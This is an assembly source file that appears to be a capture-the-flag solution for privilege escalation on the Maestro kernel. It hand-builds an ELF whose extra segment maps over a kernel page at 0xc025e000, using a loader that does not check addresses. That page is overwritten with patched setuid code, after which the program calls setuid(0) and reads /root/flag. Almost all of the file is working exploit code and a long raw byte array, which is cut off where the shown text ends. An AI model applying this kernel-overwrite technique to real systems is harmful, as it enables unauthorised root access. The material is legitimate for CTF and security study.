
; Asm:  nasm -f bin -o exp solve.s
; Run:  mknod nod b 8 0; dd if=nod of=exp; chmod +x exp; ./exp

BITS 32

ehdr:                                                 ; Elf32_Ehdr
              db      0x7F, "ELF", 1, 1, 1, 0         ;   e_ident
      times 8 db      0
              dw      2                               ;   e_type
              dw      3                               ;   e_machine
              dd      1                               ;   e_version
              dd      _start                          ;   e_entry
              dd      phdr - $$                       ;   e_phoff
              dd      shdr - $$                       ;   e_shoff
              dd      0                               ;   e_flags
              dw      ehdrsize                        ;   e_ehsize
              dw      phdrsize                        ;   e_phentsize
              dw      2                               ;   e_phnum
              dw      shentsize                       ;   e_shentsize
              dw      1                               ;   e_shnum
              dw      0                               ;   e_shstrndx

ehdrsize      equ     $ - ehdr

phdr:
main_seg:                                             ; Elf32_Phdr
              dd      1                               ;   p_type
              dd      0                               ;   p_offset
              dd      $$                              ;   p_vaddr
              dd      0                               ;   p_paddr
              dd      mainsize                        ;   p_filesz
              dd      mainsize                        ;   p_memsz
              dd      5                               ;   p_flags
              dd      0x1000                          ;   p_align

phdrsize      equ     $ - phdr

; Maestro ELF loader doesn't check if the segment mappings are in the user-space range.
; We can abuse this fact to overwrite kernel memory.
pwn_seg:
              dd      1                               ;   p_type
              dd      page - $$                       ;   p_offset
              dd      0xc025e000                      ;   p_vaddr     <-- kernel page addr
              dd      0                               ;   p_paddr
              dd      0x1000                          ;   p_filesz
              dd      0x1000                          ;   p_memsz
              dd      5                               ;   p_flags
              dd      0x1000                          ;   p_align

; Maestro doesn't like ELFs with no sections, so we have to add one
shdr:
              dd    1                                 ; sh_name
              dd    6                                 ; sh_type = SHT_DYNAMIC
              dd    0                                 ; sh_flags
              dd    0                                 ; sh_addr
              dd    0                                 ; sh_offset
              dd    0                                 ; sh_size
              dd    0                                 ; sh_link
              dd    0                                 ; sh_info
              dd    8                                 ; sh_addralign
              dd    7                                 ; sh_entsize

shentsize     equ   $ - shdr


_start:
    ; setuid(0)
    xor ebx, ebx
    mov eax, 23
    int 0x80
    
    ; open("/root/flag", 0)
    mov ebx, flag
    mov eax, 5
    mov ecx, 0
    int 80h

    ; read(eax, esp, 0x100)
    mov eax, 3  
    mov ebx, eax
    mov ecx, esp 
    mov edx, 0x100    
    int 80h     
    
    ; write(1, esp, len)
    mov edx, eax
    mov eax, 4
    mov ebx, 1
    mov ecx, esp 
    int 80h 

    ; exit(0)
    mov eax, 1
    xor ebx, ebx
    int 80h


flag db "/root/flag", 0
mainsize equ $ - $$

; Copy of a kernel page @ 0xc025e000, which contains the setuid() function code, except
; it had been patched to allow setuid(0) unconditionally

page: db 0xed, 0xf0, 0xff, 0x4f, 0x4, 0x75, 0xd, 0x57, 0x89, 0xd6, 0xe8, 0xc1, 0xe1, 0x3, 0x0, 0x89, 0xf2, 0x83, 0xc4, 0x4, 0x89, 0xe8, 0x83, 0xc4, 0x10, 0x5e, 0x5f, 0x5b, 0x5d, 0xc3, 0x8d, 0x83, 0x78, 0xb0, 0xff, 0xff, 0x8d, 0x8b, 0xd5, 0x2b, 0xfe, 0xff, 0x50, 0x6a, 0x12, 0x51, 0xe8, 0xdd, 0x74, 0x8, 0x0, 0x83, 0xc4, 0xc, 0xf, 0xb, 0x8d, 0x83, 0xb4, 0xc0, 0xff, 0xff, 0x8d, 0x8b, 0x23, 0x46, 0xfe, 0xff, 0x50, 0x6a, 0x2b, 0x51, 0xe8, 0xc3, 0x75, 0x8, 0x0, 0x83, 0xc4, 0xc, 0xf, 0xb, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x55, 0x89, 0xe5, 0x53, 0x57, 0x56, 0x83, 0xe4, 0xf8, 0x83, 0xec, 0x50, 0xe8, 0x0, 0x0, 0x0, 0x0, 0x5b, 0x81, 0xc3, 0xf3, 0x39, 0xb, 0x0, 0x8b, 0x45, 0x8, 0x8b, 0x48, 0x14, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x78, 0x6e, 0x8b, 0x48, 0x20, 0x89, 0x4c, 0x24, 0x34, 0x8b, 0x40, 0x24, 0x89, 0x44, 0x24, 0x30, 0x8b, 0xb3, 0xc0, 0x8d, 0x10, 0x0, 0xe8, 0x5b, 0x25, 0x3, 0x0, 0xfa, 0xb1, 0x1, 0x86, 0x4e, 0x8, 0x84, 0xc9, 0x74, 0x12, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0x4e, 0x8, 0x84, 0xc9, 0x75, 0xf5, 0x8b, 0x93, 0x34, 0xff, 0xff, 0xff, 0x8b, 0xa, 0x85, 0xc9, 0x75, 0x6, 0x85, 0xc0, 0xf, 0x95, 0x42, 0x4, 0x8d, 0x41, 0x1, 0x89, 0x2, 0x8b, 0x7e, 0x34, 0x85, 0xff, 0x74, 0x6, 0xf0, 0xff, 0x7, 0x8b, 0xa, 0x49, 0x89, 0xa, 0xf, 0xb6, 0x42, 0x4, 0xc6, 0x46, 0x8, 0x0, 0x85, 0xc9, 0x75, 0x16, 0x84, 0xc0, 0x74, 0x12, 0xfb, 0xeb, 0x10, 0xba, 0x9, 0x0, 0x0, 0x0, 0xb8, 0x1, 0x0, 0x0, 0x0, 0xe9, 0x88, 0x3, 0x0, 0x0, 0xfa, 0x89, 0x54, 0x24, 0x8, 0x85, 0xff, 0xf, 0x84, 0x19, 0x4, 0x0, 0x0, 0x8d, 0x77, 0x8, 0xe8, 0xe2, 0x24, 0x3, 0x0, 0xfa, 0xb1, 0x1, 0x86, 0x4f, 0x8, 0x84, 0xc9, 0x74, 0x18, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0xe, 0x84, 0xc9, 0x75, 0xf6, 0x8b, 0x54, 0x24, 0x8, 0x8b, 0xa, 0x85, 0xc9, 0x75, 0x6, 0x85, 0xc0, 0xf, 0x95, 0x42, 0x4, 0x41, 0x89, 0xa, 0x8b, 0x8f, 0xd8, 0x4, 0x0, 0x0, 0x85, 0xc9, 0xf, 0x84, 0xe8, 0x3, 0x0, 0x0, 0x90, 0x90, 0x90, 0x90, 0x90, 0xb0, 0x1, 0x86, 0x41, 0x8, 0x84, 0xc0, 0x74, 0xb, 0xf3, 0x90, 0xb0, 0x1, 0x86, 0x41, 0x8, 0x84, 0xc0, 0x75, 0xf5, 0x8b, 0x41, 0xc, 0xc7, 0x44, 0x24, 0x18, 0x9, 0x0, 0x0, 0x0, 0x89, 0x44, 0x24, 0x24, 0x85, 0xc0, 0xf, 0x84, 0xa7, 0x2, 0x0, 0x0, 0x8b, 0x51, 0x10, 0x89, 0x4c, 0x24, 0x10, 0x8b, 0x49, 0x14, 0x39, 0xd1, 0xf, 0x87, 0xc0, 0x3, 0x0, 0x0, 0x85, 0xc9, 0x74, 0x69, 0x89, 0x74, 0x24, 0xc, 0x89, 0x7c, 0x24, 0x14, 0x89, 0x5c, 0x24, 0x4, 0x31, 0xff, 0x89, 0x4c, 0x24, 0x1c, 0x8b, 0x54, 0x24, 0x20, 0x8b, 0x5c, 0x24, 0x24, 0xeb, 0xb, 0x90, 0x90, 0x90, 0x89, 0x4c, 0x24, 0x1c, 0x29, 0xf9, 0x76, 0x2d, 0xd1, 0xe9, 0x1, 0xf9, 0x8d, 0x34, 0x49, 0xb0, 0xff, 0x39, 0x54, 0xb3, 0x4, 0xf, 0x95, 0xc4, 0x72, 0x2, 0x88, 0xe0, 0x3c, 0x1, 0x74, 0xe0, 0xf, 0xb6, 0xc0, 0x3d, 0xff, 0x0, 0x0, 0x0, 0x75, 0x29, 0x41, 0x89, 0xcf, 0x8b, 0x4c, 0x24, 0x1c, 0x29, 0xf9, 0x77, 0xd3, 0x8b, 0x5c, 0x24, 0x4, 0x8b, 0x7c, 0x24, 0x14, 0x8b, 0x54, 0x24, 0x8, 0x8b, 0x74, 0x24, 0xc, 0xe9, 0x24, 0x2, 0x0, 0x0, 0x8b, 0x54, 0x24, 0x8, 0xe9, 0x1b, 0x2, 0x0, 0x0, 0x8b, 0x44, 0x24, 0x24, 0x8b, 0x14, 0xb0, 0xb1, 0x1, 0xb0, 0x1, 0x86, 0x42, 0x8, 0x84, 0xc0, 0x74, 0x16, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb0, 0x1, 0x86, 0x42, 0x8, 0x84, 0xc0, 0x75, 0xf5, 0x89, 0x54, 0x24, 0x24, 0x8d, 0x42, 0xc, 0x8b, 0x54, 0x24, 0x4, 0x8b, 0xba, 0x90, 0xff, 0xff, 0xff, 0x86, 0xf, 0x84, 0xc9, 0x8b, 0x74, 0x24, 0xc, 0x74, 0x14, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0xf, 0x84, 0xc9, 0x75, 0xf6, 0x8d, 0x4f, 0x4, 0x8b, 0x5c, 0x24, 0x4, 0x50, 0x51, 0xe8, 0x68, 0x36, 0xfd, 0xff, 0x83, 0xc4, 0x8, 0x85, 0xc0, 0xf, 0x84, 0x31, 0x1, 0x0, 0x0, 0x8b, 0x10, 0xf0, 0xff, 0x2, 0x8b, 0x58, 0x4, 0xc6, 0x7, 0x0, 0x8b, 0x43, 0x8, 0x89, 0x44, 0x24, 0x20, 0x48, 0x83, 0xe0, 0xf8, 0xb1, 0x1, 0x86, 0x4c, 0x10, 0x8, 0x89, 0x54, 0x24, 0x2c, 0x1, 0xc2, 0x83, 0xc2, 0x8, 0x84, 0xc9, 0x74, 0xe, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb0, 0x1, 0x86, 0x2, 0x84, 0xc0, 0x75, 0xf6, 0x89, 0x5c, 0x24, 0x28, 0x8b, 0x43, 0x20, 0x8b, 0x7c, 0x24, 0x20, 0x8d, 0xc, 0x3a, 0x89, 0x54, 0x24, 0x1c, 0x8d, 0x54, 0x24, 0x38, 0x8b, 0x5c, 0x24, 0x4, 0x51, 0x52, 0xff, 0x50, 0xc, 0x83, 0xc4, 0x4, 0xc7, 0x44, 0x24, 0x18, 0x58, 0x0, 0x0, 0x0, 0x3, 0x7c, 0x24, 0x1c, 0x89, 0x7c, 0x24, 0x20, 0xf, 0x84, 0xf0, 0x0, 0x0, 0x0, 0x8b, 0x44, 0x24, 0x44, 0x8b, 0x4c, 0x24, 0x40, 0x8b, 0x54, 0x24, 0x38, 0x8b, 0x74, 0x24, 0x3c, 0x81, 0xf2, 0x4b, 0x27, 0x88, 0x96, 0x81, 0xf1, 0x37, 0x78, 0x83, 0xb3, 0x9, 0xd1, 0x81, 0xf6, 0xb3, 0xa6, 0x55, 0xba, 0x35, 0x11, 0xce, 0xf8, 0xe6, 0x9, 0xf0, 0x8b, 0x74, 0x24, 0xc, 0x9, 0xc8, 0xf, 0x85, 0xb9, 0x0, 0x0, 0x0, 0x8b, 0x44, 0x24, 0x14, 0x8b, 0xb8, 0xd4, 0x4, 0x0, 0x0, 0x85, 0xff, 0xf, 0x84, 0x35, 0x2, 0x0, 0x0, 0x8b, 0x5c, 0x24, 0x4, 0xe8, 0xb6, 0x22, 0x3, 0x0, 0xfa, 0xb1, 0x1, 0x86, 0x4f, 0x8, 0x84, 0xc9, 0x74, 0xd, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0x4f, 0x8, 0x84, 0xc9, 0x75, 0xf5, 0x8b, 0x74, 0x24, 0x8, 0x8b, 0xe, 0x85, 0xc9, 0x8b, 0x54, 0x24, 0x34, 0x75, 0x6, 0x85, 0xc0, 0xf, 0x95, 0x46, 0x4, 0x41, 0x89, 0xe, 0x85, 0xd2, 0x74, 0x4b, 0x8d, 0x47, 0xc, 0x8b, 0x5c, 0x24, 0x4, 0x6a, 0x0, 0x6a, 0x1, 0xff, 0x74, 0x24, 0x38, 0x52, 0x50, 0xe8, 0x34, 0xc8, 0x1, 0x0, 0x83, 0xc4, 0x14, 0x8b, 0xe, 0xf, 0xb6, 0x56, 0x4, 0x84, 0xc0, 0x74, 0x2c, 0x49, 0x89, 0xe, 0xc6, 0x47, 0x8, 0x0, 0xf, 0x85, 0xed, 0x0, 0x0, 0x0, 0x84, 0xd2, 0xf, 0x84, 0xe5, 0x0, 0x0, 0x0, 0xfb, 0xe9, 0xe0, 0x0, 0x0, 0x0, 0xc6, 0x7, 0x0, 0xc7, 0x44, 0x24, 0x18, 0x2, 0x0, 0x0, 0x0, 0xeb, 0x59, 0xf, 0xb6, 0x56, 0x4, 0x49, 0x89, 0xe, 0xc6, 0x47, 0x8, 0x0, 0x75, 0x7, 0x84, 0xd2, 0x74, 0x3, 0xfb, 0xeb, 0x1, 0xfa, 0xc7, 0x44, 0x24, 0x18, 0xe, 0x0, 0x0, 0x0, 0x8b, 0x74, 0x24, 0xc, 0x8b, 0x44, 0x24, 0x1c, 0xc6, 0x0, 0x0, 0x8b, 0x7c, 0x24, 0x2c, 0xf0, 0xff, 0xf, 0x75, 0x28, 0x8b, 0x5c, 0x24, 0x4, 0xff, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x2c, 0xff, 0x10, 0x83, 0xc4, 0x4, 0xf0, 0xff, 0x4f, 0x4, 0x89, 0xf8, 0x8b, 0x7c, 0x24, 0x14, 0x75, 0x13, 0x50, 0xe8, 0xbb, 0xdd, 0x3, 0x0, 0x83, 0xc4, 0x4, 0xeb, 0x8, 0x8b, 0x5c, 0x24, 0x4, 0x8b, 0x7c, 0x24, 0x14, 0x8b, 0x54, 0x24, 0x8, 0x8b, 0x44, 0x24, 0x24, 0xc6, 0x40, 0x8, 0x0, 0x8b, 0x4c, 0x24, 0x10, 0xc6, 0x41, 0x8, 0x0, 0xff, 0xa, 0xf, 0xb6, 0x42, 0x4, 0xc6, 0x6, 0x0, 0x75, 0x15, 0x84, 0xc0, 0x74, 0x11, 0xfb, 0xf0, 0xff, 0xf, 0xb8, 0x1, 0x0, 0x0, 0x0, 0x74, 0x11, 0x8b, 0x54, 0x24, 0x18, 0xeb, 0x35, 0xfa, 0xf0, 0xff, 0xf, 0xb8, 0x1, 0x0, 0x0, 0x0, 0x75, 0xef, 0x89, 0xf1, 0xe8, 0xc8, 0x71, 0xff, 0xff, 0xf0, 0xff, 0x4f, 0x4, 0xbe, 0x1, 0x0, 0x0, 0x0, 0xb8, 0x1, 0x0, 0x0, 0x0, 0x8b, 0x54, 0x24, 0x18, 0x75, 0xf, 0x57, 0x89, 0xd7, 0xe8, 0x4c, 0xdd, 0x3, 0x0, 0x89, 0xfa, 0x83, 0xc4, 0x4, 0x89, 0xf0, 0x8d, 0x65, 0xf4, 0x5e, 0x5f, 0x5b, 0x5d, 0xc3, 0xfa, 0x8b, 0x74, 0x24, 0xc, 0x8b, 0x44, 0x24, 0x10, 0x8b, 0x4c, 0x24, 0x1c, 0xc6, 0x1, 0x0, 0x8b, 0x7c, 0x24, 0x2c, 0xf0, 0xff, 0xf, 0x8b, 0x5c, 0x24, 0x4, 0x75, 0x24, 0xff, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x2c, 0xff, 0x10, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc4, 0x4, 0xf0, 0xff, 0x4f, 0x4, 0x75, 0xd, 0x57, 0xe8, 0x3, 0xdd, 0x3, 0x0, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc4, 0x4, 0x8b, 0x4c, 0x24, 0x24, 0xc6, 0x41, 0x8, 0x0, 0xc6, 0x40, 0x8, 0x0, 0x8b, 0x44, 0x24, 0x8, 0xff, 0x8, 0xf, 0xb6, 0x40, 0x4, 0xc6, 0x6, 0x0, 0x8b, 0x7c, 0x24, 0x14, 0x75, 0x7, 0x84, 0xc0, 0x74, 0x3, 0xfb, 0xeb, 0x1, 0xfa, 0x31, 0xd2, 0xf0, 0xff, 0xf, 0xb8, 0x0, 0x0, 0x0, 0x0, 0x75, 0x84, 0x89, 0xf1, 0xe8, 0x22, 0x71, 0xff, 0xff, 0x31, 0xd2, 0xf0, 0xff, 0x4f, 0x4, 0xbe, 0x0, 0x0, 0x0, 0x0, 0xb8, 0x0, 0x0, 0x0, 0x0, 0xf, 0x84, 0x58, 0xff, 0xff, 0xff, 0xe9, 0x62, 0xff, 0xff, 0xff, 0x8d, 0x83, 0x78, 0xb0, 0xff, 0xff, 0x8d, 0x8b, 0xd5, 0x2b, 0xfe, 0xff, 0x50, 0x6a, 0x12, 0x51, 0xe8, 0xd2, 0x6f, 0x8, 0x0, 0x83, 0xc4, 0xc, 0xf, 0xb, 0x8d, 0x83, 0xc4, 0xc0, 0xff, 0xff, 0x8d, 0x8b, 0x23, 0x46, 0xfe, 0xff, 0x50, 0x6a, 0x2b, 0x51, 0xe8, 0xb8, 0x70, 0x8, 0x0, 0x83, 0xc4, 0xc, 0xf, 0xb, 0x8d, 0x83, 0x64, 0xda, 0xff, 0xff, 0x50, 0x52, 0x51, 0xe8, 0xf5, 0x77, 0x8, 0x0, 0x83, 0xc4, 0xc, 0xf, 0xb, 0x8b, 0x5c, 0x24, 0x4, 0x8d, 0x83, 0xd4, 0xc0, 0xff, 0xff, 0xeb, 0xcd, 0x66, 0x90, 0x66, 0x90, 0x55, 0x53, 0x57, 0x56, 0x83, 0xec, 0x8, 0xe8, 0x0, 0x0, 0x0, 0x0, 0x5b, 0x81, 0xc3, 0xd8, 0x34, 0xb, 0x0, 0x8b, 0x44, 0x24, 0x1c, 0xf, 0xb7, 0x40, 0x14, 0x66, 0x89, 0x44, 0x24, 0x6, 0x8b, 0xb3, 0xc0, 0x8d, 0x10, 0x0, 0x89, 0x1c, 0x24, 0xe8, 0x4c, 0x20, 0x3, 0x0, 0xfa, 0xb1, 0x1, 0x86, 0x4e, 0x8, 0x84, 0xc9, 0x74, 0x13, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0x4e, 0x8, 0x84, 0xc9, 0x75, 0xf5, 0x8b, 0xc, 0x24, 0x8b, 0xa9, 0x34, 0xff, 0xff, 0xff, 0x8b, 0x4d, 0x0, 0x85, 0xc9, 0x75, 0x6, 0x85, 0xc0, 0xf, 0x95, 0x45, 0x4, 0x8d, 0x41, 0x1, 0x89, 0x45, 0x0, 0x8b, 0x7e, 0x34, 0x85, 0xff, 0x74, 0x7, 0xf0, 0xff, 0x7, 0x8b, 0x4d, 0x0, 0x49, 0x89, 0x4d, 0x0, 0xf, 0xb6, 0x45, 0x4, 0xc6, 0x46, 0x8, 0x0, 0x85, 0xc9, 0x75, 0x7, 0x84, 0xc0, 0x74, 0x3, 0xfb, 0xeb, 0x1, 0xfa, 0x85, 0xff, 0xf, 0x84, 0x0, 0x1, 0x0, 0x0, 0x8d, 0x77, 0x8, 0x8b, 0x1c, 0x24, 0xe8, 0xdb, 0x1f, 0x3, 0x0, 0xfa, 0xb1, 0x1, 0x86, 0x4f, 0x8, 0x84, 0xc9, 0x74, 0x11, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0xe, 0x84, 0xc9, 0x75, 0xf6, 0x8b, 0x4d, 0x0, 0x85, 0xc9, 0x74, 0x2b, 0xf, 0xb7, 0x57, 0x40, 0x66, 0x85, 0xd2, 0x74, 0x31, 0x8d, 0x5f, 0x40, 0xf, 0xb7, 0x44, 0x24, 0x6, 0x66, 0x39, 0xc2, 0x74, 0x34, 0x66, 0x39, 0x47, 0x3c, 0x74, 0x2e, 0x66, 0x39, 0x47, 0x44, 0x74, 0x28, 0x31, 0xdb, 0xb8, 0x1, 0x0, 0x0, 0x0, 0xeb, 0x26, 0x85, 0xc0, 0xf, 0x95, 0x45, 0x4, 0xf, 0xb7, 0x57, 0x40, 0x66, 0x85, 0xd2, 0x90, 0x90, 0xf, 0xb7, 0x44, 0x24, 0x6, 0x66, 0x89, 0x47, 0x3c, 0x66, 0x89, 0x47, 0x40, 0x8d, 0x5f, 0x44, 0x66, 0x89, 0x3, 0x31, 0xc0, 0xb3, 0x1, 0x89, 0x4d, 0x0, 0xf, 0xb6, 0x55, 0x4, 0xc6, 0x6, 0x0, 0x85, 0xc9, 0x75, 0x33, 0x84, 0xd2, 0x74, 0x2f, 0xfb, 0xf0, 0xff, 0xf, 0xf, 0x94, 0xc1, 0x84, 0xdb, 0x75, 0x2f, 0xbd, 0x1, 0x0, 0x0, 0x0, 0x84, 0xc9, 0x74, 0x52, 0x89, 0xf1, 0x89, 0xc6, 0x8b, 0x1c, 0x24, 0xe8, 0x6c, 0x6f, 0xff, 0xff, 0x89, 0xf0, 0xf0, 0xff, 0x4f, 0x4, 0xbd, 0x1, 0x0, 0x0, 0x0, 0x74, 0x29, 0xeb, 0x37, 0xfa, 0xf0, 0xff, 0xf, 0xf, 0x94, 0xc1, 0x84, 0xdb, 0x74, 0xd1, 0x31, 0xed, 0x84, 0xc9, 0x74, 0x26, 0x89, 0xf1, 0x89, 0xc6, 0x8b, 0x1c, 0x24, 0xe8, 0x40, 0x6f, 0xff, 0xff, 0x89, 0xf0, 0x31, 0xed, 0xf0, 0xff, 0x4f, 0x4, 0x75, 0x10, 0x89, 0xc6, 0x8b, 0x1c, 0x24, 0x57, 0xe8, 0xcb, 0xda, 0x3, 0x0, 0x89, 0xf0, 0x83, 0xc4, 0x4, 0x89, 0xea, 0x83, 0xc4, 0x8, 0x5e, 0x5f, 0x5b, 0x5d, 0xc3, 0x8b, 0x1c, 0x24, 0x8d, 0x83, 0x78, 0xb0, 0xff, 0xff, 0x8d, 0x8b, 0xd5, 0x2b, 0xfe, 0xff, 0x50, 0x6a, 0x12, 0x51, 0xe8, 0xe4, 0x6d, 0x8, 0x0, 0x83, 0xc4, 0xc, 0xf, 0xb, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x66, 0x90, 0x90, 0x55, 0x53, 0x57, 0x56, 0x83, 0xec, 0x7c, 0xe8, 0x0, 0x0, 0x0, 0x0, 0x5b, 0x81, 0xc3, 0x18, 0x33, 0xb, 0x0, 0x8b, 0x84, 0x24, 0x90, 0x0, 0x0, 0x0, 0x8b, 0x70, 0x14, 0x8b, 0x48, 0x18, 0x89, 0x4c, 0x24, 0x8, 0x8b, 0x40, 0x1c, 0x89, 0x44, 0x24, 0x30, 0x8b, 0xbb, 0xc0, 0x8d, 0x10, 0x0, 0xe8, 0x84, 0x1e, 0x3, 0x0, 0xfa, 0xb1, 0x1, 0x86, 0x4f, 0x8, 0x84, 0xc9, 0x74, 0xb, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0x4f, 0x8, 0x84, 0xc9, 0x75, 0xf5, 0x8b, 0xab, 0x34, 0xff, 0xff, 0xff, 0x8b, 0x4d, 0x0, 0x85, 0xc9, 0x75, 0x6, 0x85, 0xc0, 0xf, 0x95, 0x45, 0x4, 0x8d, 0x41, 0x1, 0x89, 0x45, 0x0, 0x8b, 0x57, 0x34, 0x85, 0xd2, 0x74, 0x7, 0xf0, 0xff, 0x2, 0x8b, 0x4d, 0x0, 0x49, 0x89, 0x4d, 0x0, 0xf, 0xb6, 0x45, 0x4, 0xc6, 0x47, 0x8, 0x0, 0x85, 0xc9, 0x75, 0x7, 0x84, 0xc0, 0x74, 0x3, 0xfb, 0xeb, 0x1, 0xfa, 0x85, 0xd2, 0xf, 0x84, 0xeb, 0x2, 0x0, 0x0, 0x8d, 0x7a, 0x8, 0x89, 0x54, 0x24, 0x4, 0xe8, 0x1d, 0x1e, 0x3, 0x0, 0x8b, 0x54, 0x24, 0x4, 0xfa, 0xb1, 0x1, 0x86, 0x4a, 0x8, 0x84, 0xc9, 0x74, 0xf, 0x90, 0x90, 0x90, 0x90, 0x90, 0xf3, 0x90, 0xb1, 0x1, 0x86, 0xf, 0x84, 0xc9, 0x75, 0xf6, 0x8b, 0x4d, 0x0, 0x85, 0xc9, 0x75, 0x6, 0x85, 0xc0, 0xf, 0x95, 0x45, 0x4, 0x41, 0x89, 0x4d, 0x0, 0xc7, 0x4, 0x24, 0x61, 0x0, 0x0, 0x0, 0x4e, 0x83, 0xfe, 0x10, 0xf, 0x87, 0x26, 0x2, 0x0, 0x0, 0xb1, 0x1, 0xc7, 0x44, 0x24, 0xc, 0x0, 0x0, 0x0, 0x0, 0x8b, 0x84, 0xb3, 0x60, 0x44, 0xfe, 0xff, 0x1, 0xd8, 0xff, 0xe0, 0xb1, 0x1, 0xb0, 0x1, 0x89, 0x44, 0x24, 0xc, 0xeb, 0x18, 0xb0, 0x2, 0x89, 0x44, 0x24, 0xc, 0xeb, 0x10, 0xb0, 0x3, 0x89, 0x44, 0x24, 0xc, 0xeb, 0x8, 0xb0, 0x4, 0x89, 0x44, 0x24, 0xc, 0x31, 0xc9, 0xc7, 0x4, 0x24, 0x5d, 0x0, 0x0, 0x0, 0x8b, 0x74, 0x24, 0x8, 0x4e, 0x83, 0xfe, 0x4, 0xf, 0x87, 0xda, 0x1, 0x0, 0x0, 0xb0, 0x1, 0xc7, 0x44, 0x24, 0x8, 0x0, 0x0, 0x0, 0x0, 0x8b, 0xb4, 0xb3, 0xa4, 0x44, 0xfe, 0xff, 0x1, 0xde, 0xff, 0xe6, 0xb0, 0x1, 0x89, 0xce, 0xb1, 0x1, 0xeb, 0xe, 0xb0, 0x3, 0x89, 0x44, 0x24, 0x8, 0x31, 0xc0, 0xeb, 0xa, 0x89, 0xce, 0xb1, 0x2, 0x89, 0x4c, 0x24, 0x8, 0x89, 0xf1, 0xf, 0xb7, 0x72, 0x40, 0x66, 0x85, 0xf6, 0xf, 0x94, 0xc2, 0x8, 0xd1, 0x8b, 0x54, 0x24, 0x4, 0x75, 0x12, 0xc7, 0x4, 0x24, 0xd, 0x0, 0x0, 0x0, 0x66, 0x83, 0x7a, 0x42, 0x0, 0xf, 0x85, 0x85, 0x1, 0x0, 0x0, 0x66, 0x85, 0xf6, 0xf, 0x94, 0xc1, 0x8, 0xc8, 0x75, 0x12, 0xc7, 0x4, 0x24, 0xd, 0x0, 0x0, 0x0, 0x66, 0x83, 0x7a, 0x42, 0x0, 0xf, 0x85, 0x69, 0x1, 0x0, 0x0, 0x8b, 0x44, 0x24, 0xc, 0x88, 0x44, 0x24, 0x38, 0x8b, 0x44, 0x24, 0x8, 0x88, 0x44, 0x24, 0x39, 0x8b, 0x44, 0x24, 0x30, 0x89, 0x44, 0x24, 0x34, 0x8d, 0x44, 0x24, 0x34, 0x50, 0xe8, 0x55, 0x96, 0x2, 0x0, 0x83, 0xc4, 0x4, 0x85, 0xc0, 0x74, 0x37, 0xc7, 0x44, 0x24, 0x10, 0x2, 0x0, 0x0, 0x0, 0x8d, 0x8b, 0x58, 0xbd, 0xff, 0xff, 0x8d, 0x74, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x3c, 0x51, 0x50, 0x56, 0x52, 0xe8, 0x6f, 0x8d, 0xff, 0xff, 0x83, 0xc4, 0xc, 0x8b, 0x44, 0x24, 0x3c, 0x83, 0xf8, 0x2, 0x75, 0x18, 0x8b, 0x44, 0x24, 0x40, 0x89, 0x4, 0x24, 0xe9, 0x5, 0x1, 0x0, 0x0, 0xc7, 0x4, 0x24, 0xc, 0x0, 0x0, 0x0, 0xe9, 0xf9, 0x0, 0x0, 0x0, 0x8b, 0x4c, 0x24, 0x48, 0x8b, 0x54, 0x24, 0x40, 0x8b, 0x74, 0x24, 0x44, 0x89, 0x44, 0x24, 0x4c, 0x89, 0x54, 0x24, 0x50, 0x89, 0x4c, 0x24, 0x58, 0x89, 0x74, 0x24, 0x54, 0x8d, 0x74, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x4c, 0x50, 0x56, 0xe8, 0x60, 0xf1, 0xfa, 0xff, 0x83, 0xc4, 0x4, 0x83, 0x7c, 0x24, 0x10, 0x0, 0x8b, 0x44, 0x24, 0x14, 0x74, 0x8, 0x89, 0x4, 0x24, 0xe9, 0xb8, 0x0, 0x0, 0x0, 0x6a, 0x2, 0x50, 0x56, 0xe8, 0x91, 0xd6, 0x0, 0x0, 0x83, 0xc4, 0x8, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xf8, 0x2, 0x75, 0xc, 0x8b, 0x44, 0x24, 0x14, 0x89, 0x4, 0x24, 0xe9, 0x97, 0x0, 0x0, 0x0, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x54, 0x24, 0x18, 0x89, 0x54, 0x24, 0x64, 0x8b, 0x54, 0x24, 0x1c, 0x89, 0x54, 0x24, 0x68, 0x8b, 0x54, 0x24, 0x20, 0x89, 0x54, 0x24, 0x6c, 0x8b, 0x54, 0x24, 0x24, 0x89, 0x54, 0x24, 0x70, 0x8b, 0x54, 0x24, 0x28, 0x89, 0x54, 0x24, 0x74, 0x8b, 0x54, 0x24, 0x2c, 0x89, 0x54, 0x24, 0x78, 0x89, 0x44, 0x24, 0x5c, 0x89, 0x4c, 0x24, 0x60, 0x8b, 0x44, 0x24, 0x4, 0x8b, 0xb0, 0xd8, 0x4, 0x0, 0x0, 0x85, 0xf6, 0xf, 0x84, 0xe1, 0x0, 0x0, 0x0, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xb0, 0x1, 0x86, 0x46, 0x8, 0x84, 0xc0, 0x74, 0xb, 0xf3, 0x90, 0xb0, 0x1, 0x86, 0x46, 0x8, 0x84, 0xc0, 0x75, 